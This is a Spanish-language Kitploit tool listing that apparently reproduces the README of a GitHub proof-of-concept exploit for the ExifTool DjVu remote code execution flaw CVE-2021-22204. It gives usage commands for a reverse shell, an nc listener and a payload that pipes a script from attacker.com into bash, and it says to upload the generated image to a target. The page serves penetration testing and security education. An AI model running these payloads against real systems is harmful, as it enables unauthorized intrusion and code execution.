Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2021-22204 — Exploit de RCE en ExifTool (CVE-2021-22204) - versión mejorada, sin dependencia de exiftool | Kitploit
Herramientas/GitHubGitHub/d4ytox/cve-2021-22204
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y Educación
GitHubd4ytox/cve-2021-22204

CVE-2021-22204

Exploit de RCE en ExifTool (CVE-2021-22204) - versión mejorada, sin dependencia de exiftool

Ver Repositorio
10hace 18 díasAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2021-22204 - ExifTool Ejecución Arbitraria de Código

Un proof-of-concept mejorado para CVE-2021-22204, una vulnerabilidad en las versiones 7.44 a 12.23 de ExifTool que permite la ejecución arbitraria de código al procesar archivos DjVu maliciosos.

Créditos

Este es un trabajo derivado. La vulnerabilidad y el exploit original no son míos.

RolQuién
Vulnerabilidad descubierta porWilliam Bowling (@wcbowling), reportada a través del programa de recompensas por errores de GitLab — abril de 2021
PoC original porUNICORD (NicPWNs & Dev-Yeoj)
Modificaciones en este repositorio pord4ytox

Descripción

La neutralización incorrecta de los datos del usuario en el formato de archivo DjVu en las versiones 7.44 a 12.23 de ExifTool permite la ejecución arbitraria de código al analizar una imagen maliciosa. Este exploit genera un archivo de imagen malicioso que, al ser procesado por una versión vulnerable de ExifTool, ejecuta código controlado por el atacante.

Qué cambia esta versión

Basado en UNICORDev/exploit-CVE-2021-22204:

  • Sin dependencia de ExifTool en la máquina del atacante - El original usa exiftool -config para incrustar la carga útil, lo que falla si tu propio ExifTool está parcheado (v12.24+). Esta versión construye una carga útil DjVu pura usando únicamente djvumake.
  • Funciona en Kali moderno - Compatible con Python 3.12+ (corrige la advertencia de la secuencia de escape \c)
  • Dependencias mínimas - Solo requiere el paquete djvulibre-bin
  • Código limpio y mínimo - Sin arte ASCII ni retrasos artificiales

Estos son cambios de ingeniería sobre un exploit existente. No se reclama ninguna investigación de vulnerabilidades.

Requisitos

root@kitploit:~
sudo apt install djvulibre-bin

Uso

Shell inversa:

root@kitploit:~
python3 exploit.py -s <LHOST> <LPORT>

Comando personalizado:

root@kitploit:~
python3 exploit.py -c "id > /tmp/pwned"

Ejemplos:

root@kitploit:~
# Generar carga útil de shell inversa
python3 exploit.py -s 192.168.1.100 4444

# Generar carga útil de ejecución de comandos  
python3 exploit.py -c "curl http://attacker.com/shell.sh | bash"

# Iniciar listener y esperar la conexión
nc -nlvp 4444

El exploit genera image.jpg - súbelo a un objetivo donde ExifTool lo procese.

Versiones afectadas

  • ExifTool 7.44 - 12.23

Referencias

  • Entrada NVD - CVE-2021-22204
  • Informe original de William Bowling - HackerOne #1154542
  • Aviso de ExifTool
  • Commit del parche de ExifTool
  • PoC original - UNICORDev/exploit-CVE-2021-22204

Aviso legal

Esta herramienta se proporciona únicamente con fines educativos y de pruebas de seguridad autorizadas.

El autor no es responsable de ningún uso indebido o daño causado por esta herramienta. Usa este exploit solo contra sistemas que te pertenezcan o para los que tengas permiso explícito por escrito para realizar pruebas.

El acceso no autorizado a sistemas informáticos es ilegal y está penado por la ley. Úsalo de forma responsable.

Licencia

MIT, aplicada solo a las modificaciones de este repositorio. El PoC original no tiene licencia, por lo que conserva todos los derechos reservados por sus autores. Consulta LICENSE para ver el aviso de atribución completo.

Descargar herramienta